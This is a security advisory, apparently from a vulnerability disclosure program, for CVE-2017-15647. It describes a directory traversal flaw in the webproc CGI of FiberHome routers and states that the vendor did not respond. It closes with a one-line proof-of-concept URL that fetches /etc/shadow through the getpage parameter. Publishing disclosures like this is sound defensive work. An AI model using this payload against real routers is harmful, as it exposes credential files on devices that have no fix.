27 lines
No EOL
1.4 KiB
Markdown
27 lines
No EOL
1.4 KiB
Markdown
## Vulnerability Summary
|
||
The following advisory describes a directory traversal vulnerability found in FiberHome routers.
|
||
|
||
FiberHome Technologies Group “was established in 1974. After continuous and intensive development for over 40 years, its business has been extended to R&D, manufacturing, marketing & sales, engineering service, in 4 major areas: fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to- end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.”
|
||
|
||
## Credit
|
||
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
|
||
|
||
## Vendor response
|
||
Update 1:
|
||
|
||
Cve issued: CVE-2017-15647
|
||
|
||
We tried to contact FiberHome since September 6 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for the vulnerability.
|
||
|
||
## Vulnerability details
|
||
User controlled input is not sufficiently sanitized when passed to /cgi-bin/webproc.
|
||
|
||
/cgi-bin/webproc receives getpage= as parameter input.
|
||
|
||
When we pass the directory of a file as a parameter input with parameter var:page, we will get the file from the router.
|
||
|
||
## Proof of Concept
|
||
|
||
```
|
||
http://+IP+ /cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:page=wizardfifth
|
||
``` |